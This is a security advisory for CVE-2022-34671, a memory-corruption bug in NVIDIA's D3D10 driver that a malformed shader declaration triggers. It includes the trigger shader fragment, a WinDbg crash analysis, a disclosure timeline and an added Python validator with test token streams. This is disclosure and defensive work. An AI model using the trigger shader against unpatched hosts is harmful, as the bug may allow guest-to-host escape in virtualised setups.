CVE-2022-34671
A memory corruption vulnerability exists in the Shader Functionality of NVIDIA D3D10 Driver, Version 528.24, 31.0.15.2824. A specially crafted executable/shader file containing a dcl_resource_structured declaration with an out-of-bounds index can lead to memory corruption. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running in virtualization environments (i.e. VMware, qemu, VirtualBox, etc.) in order to perform a guest-to-host escape, as previously demonstrated (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically, this vulnerability could also be triggered from a web browser (using WebGL and WebAssembly). We were able to trigger this vulnerability from a Hyper-V guest using the RemoteFX feature, leading to execution of the vulnerable code on the Hyper-V host (inside the rdvgm.exe process). While RemoteFX was recently deprecated by Microsoft, some older machines may still use this software.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
NVIDIA D3D10 Driver, Version 528.24, 31.0.15.2824
D3D10 Driver - https://nvidia.com
8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787 - Out-of-bounds Write
NVIDIA graphics drivers are the software for NVIDIA GPUs installed in a PC. They mediate communication between the operating system and the GPU device, and in most cases this software is required for the hardware to function properly.
This vulnerability can be triggered by supplying a malformed shader, which leads to a memory corruption problem in the NVIDIA driver.
Example of shader triggering the bug:
cs_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer cb0[5], immediateIndexed
dcl_resource_structured t0, 16
dcl_resource_structured <unknown register type 226>, 33554527 // dcl_resource_structured atomic_umax[288231054756544520][0][u0]
...
dcl_resource_structured is an instruction that declares a shader resource input and assigns it to a t# register, a placeholder register for the resource.
By specifying out-of-bounds values as an operand to this instruction, an attacker is able to trigger this memory corruption vulnerability.
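The bounds check a host-side shader validator would apply to such declarations, as an added example that is not part of the Talos advisory or the NVIDIA driver. The token bit layout follows the public DXBC shader model 4/5 token format (d3d10tokenizedprogramformat.hpp); the two token streams at the end are constructed to mirror the well-formed and malformed declarations shown above, and the checker assumes it is given the instruction DWORDs of an SHEX/SHDR chunk with the version/length header already stripped.

```python
import struct

OPCODE_DCL_RESOURCE_STRUCTURED = 162   # D3D11_SB_OPCODE_DCL_RESOURCE_STRUCTURED
OPERAND_TYPE_RESOURCE = 7              # D3D10_SB_OPERAND_TYPE_RESOURCE (t# registers)
INDEX_REP_IMMEDIATE32 = 0              # D3D10_SB_OPERAND_INDEX_IMMEDIATE32
MAX_T_REGISTERS = 128                  # D3D11_COMMONSHADER_INPUT_RESOURCE_SLOT_COUNT


def tokens_from_bytes(data):
    """Little-endian DWORD tokens; a trailing partial DWORD is ignored."""
    usable = len(data) - len(data) % 4
    return list(struct.unpack(f"<{usable // 4}I", data[:usable]))


def opcode_token(opcode, length):
    # [10:00] opcode type, [30:24] instruction length in DWORDs (opcode token included)
    return (opcode & 0x7FF) | ((length & 0x7F) << 24)


def operand_token(op_type, index_dim=1, index_rep=INDEX_REP_IMMEDIATE32):
    # [19:12] operand type, [21:20] index dimension, [24:22] index-1 representation
    return ((op_type & 0xFF) << 12) | ((index_dim & 3) << 20) | ((index_rep & 7) << 22)


def check_structured_decls(tokens):
    """Walk the token stream and return the problems found in every
    dcl_resource_structured declaration (an empty list means all were in range)."""
    problems, pos = [], 0
    while pos < len(tokens):
        tok = tokens[pos]
        opcode, length = tok & 0x7FF, (tok >> 24) & 0x7F
        if length == 0:
            problems.append(f"token {pos}: zero-length instruction")
            break
        if opcode == OPCODE_DCL_RESOURCE_STRUCTURED:
            if length != 4 or pos + 4 > len(tokens):
                problems.append(f"token {pos}: truncated declaration")
                break
            operand = tokens[pos + 1]
            op_type, index_dim, index_rep = (operand >> 12) & 0xFF, (operand >> 20) & 3, (operand >> 22) & 7
            reg, stride = tokens[pos + 2], tokens[pos + 3]
            if op_type != OPERAND_TYPE_RESOURCE:
                problems.append(f"token {pos}: operand type {op_type} is not a t# register")
            if index_dim != 1 or index_rep != INDEX_REP_IMMEDIATE32:
                problems.append(f"token {pos}: t# must use exactly one immediate 32-bit index")
            if reg >= MAX_T_REGISTERS:   # the out-of-bounds index the driver trusted
                problems.append(f"token {pos}: t{reg} out of range (max t{MAX_T_REGISTERS - 1})")
            if stride == 0 or stride % 4:
                problems.append(f"token {pos}: stride {stride} is not a positive multiple of 4")
        pos += length
    return problems


# Constructed streams: "dcl_resource_structured t0, 16" and a malformed
# declaration with an unknown operand type and a huge register index.
GOOD = [opcode_token(OPCODE_DCL_RESOURCE_STRUCTURED, 4), operand_token(OPERAND_TYPE_RESOURCE), 0, 16]
BAD = [opcode_token(OPCODE_DCL_RESOURCE_STRUCTURED, 4), operand_token(226), 0x0400009E, 33554527]
```

Rejecting a shader on any reported problem before it reaches the user-mode driver is the mitigation a hypervisor's or remoting stack's shader-validation path would apply.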
rax=0000000000000000 rbx=00000256723d3990 rcx=000000000000100b
rdx=0000000000000800 rsi=000000762c0dedb0 rdi=000000762c0dedb0
rip=00007ff9c06d54a5 rsp=000000762c0ded08 rbp=000000000400009e
r8=00000256723d3990 r9=000000000000000b r10=000000000400009e
r11=00000256723d5c50 r12=00000256723d5c50 r13=00007ff9c0110000
r14=000000000400009e r15=0000000000000001
iopl=0 no up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
00007FF9C06D5485 | e80583e11f | call 0x7ff9e04ed78f
00007FF9C06D548A | ba01000000 | mov edx, 0x1
00007FF9C06D548F | d3e2 | shl edx, cl
00007FF9C06D5491 | 4c8d0483 | lea r8, [rbx+rax*4]
00007FF9C06D5495 | 4109903c030000 | or [r8+0x33c], edx
00007FF9C06D549C | 8b8b38030000 | mov ecx, [rbx+0x338]
00007FF9C06D54A2 | 4103c9 | add ecx, r9d
* 00007FF9C06D54A5 | 42898c93d00b0000 | mov [rbx+r10*4+0xbd0], ecx
00007FF9C06D54AD | 488b5c2410 | mov rbx, [rsp+0x10]
00007FF9C06D54B2 | 488b7c2418 | mov rdi, [rsp+0x18]
The RBX register value is calculated directly from the shader bytecode.
nvwgf2umx!NVAPI_Thunk+0x2a04f5:
00007ff9`c06d54a5 42898c93d00b0000 mov dword ptr [rbx+r10*4+0BD0h],ecx ds:000001fd`62999a38=????????
0:022> !analyze -v
*** WARNING: Unable to verify checksum for POC_EXEC11.exe
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : WER.OS.Branch
Value: vb_release
Key : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z
Key : WER.OS.Version
Value: 10.0.19041.1
NTGLOBALFLAG: 70
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff9c06d54a5 (nvwgf2umx!NVAPI_Thunk+0x00000000002a04f5)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000001fd62999a38
Attempt to write to address 000001fd62999a38
FAULTING_THREAD: 00005100
PROCESS_NAME: POC_EXEC11.exe
WRITE_ADDRESS: 000001fd62999a38
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwołała się do pamięci pod adresem 0x%p. Pamięć nie może być %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000001fd62999a38
STACK_TEXT:
000000e5`f695ea78 00007ff9`c06d55e2 : 00000000`0400009e 00000000`0400009e 000001fd`52998bf0 000001fd`00000000 : nvwgf2umx!NVAPI_Thunk+0x2a04f5
000000e5`f695ea80 00007ff9`c03d902d : 00000000`00000000 000001fd`52998bf0 00007ff9`c041cbb4 000000e5`f695f030 : nvwgf2umx!NVAPI_Thunk+0x2a0632
000000e5`f695eb00 00007ff9`c03d7d36 : 00000000`d54d58a2 000000e5`f695f030 00000000`d54d58a2 00000000`d54d5ba1 : nvwgf2umx!NVDEV_Thunk+0x61c3d
000000e5`f695efb0 00007ff9`c01f26c3 : 000001fd`5296e248 00000000`00000000 000001fd`5299e2e0 000000e5`f695f440 : nvwgf2umx!NVDEV_Thunk+0x60946
000000e5`f695f060 00007ff9`c01f3c6d : 000001fd`5296e248 00007ff9`d54d47b1 000001fd`4e744000 000001fd`4c8a0000 : nvwgf2umx+0xe26c3
000000e5`f695f160 00007ff9`c04410a5 : 000001fd`4e7dee00 000001fd`5296e338 000001fd`5296e248 000001fd`5296e310 : nvwgf2umx+0xe3c6d
000000e5`f695f3f0 00007ff9`c02f5fb8 : 000001fd`529b47e8 00000000`0000ffff 000001fd`4e6fb048 000001fd`5296e310 : nvwgf2umx!NVAPI_Thunk+0xc0f5
000000e5`f695f550 00007ff9`c144e9bf : 000001fd`0000002a 000001fd`00000000 000001fd`00000000 000001fd`4e7ddfb0 : nvwgf2umx!NVENCODEAPI_Thunk+0x77718
000000e5`f695f620 00007ff9`c144e91f : 00000000`00000001 00000000`00000000 00000000`000007d0 000001fd`4e7ddfb0 : nvwgf2umx!NVAPI_Thunk+0x1019a0f
000000e5`f695f650 00007ff9`c1443c4d : 000001fd`4e7de4f0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_Thunk+0x101996f
000000e5`f695f6d0 00007ff9`c0653b6a : 00000000`00000000 000001fd`4e70d4b0 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_Thunk+0x100ec9d
000000e5`f695f700 00007ff9`c1c37472 : 000001fd`4e6f1c00 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!NVAPI_Thunk+0x21ebba
000000e5`f695f730 00007ff9`d5387614 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x619382
000000e5`f695f760 00007ff9`d55026a1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000e5`f695f790 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: nvwgf2umx!NVAPI_Thunk+2a04f5
MODULE_NAME: nvwgf2umx
IMAGE_NAME: nvwgf2umx.dll
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~22s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_nvwgf2umx.dll!NVAPI_Thunk
BUCKET_ID_MODPRIVATE: 1
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
IMAGE_VERSION: 31.0.15.2824
FAILURE_ID_HASH: {394d2a7d-b34b-6afc-ef2e-834df1b40588}
Followup: MachineOwner
---------
NVIDIA released a bulletin for the issues here: https://nvidia.custhelp.com/app/answers/detail/a_id/5468
2023-02-16 - Vendor Disclosure
2023-06-27 - Vendor Patch Release
2023-08-10 - Public Release
Discovered by Piotr Bania of Cisco Talos.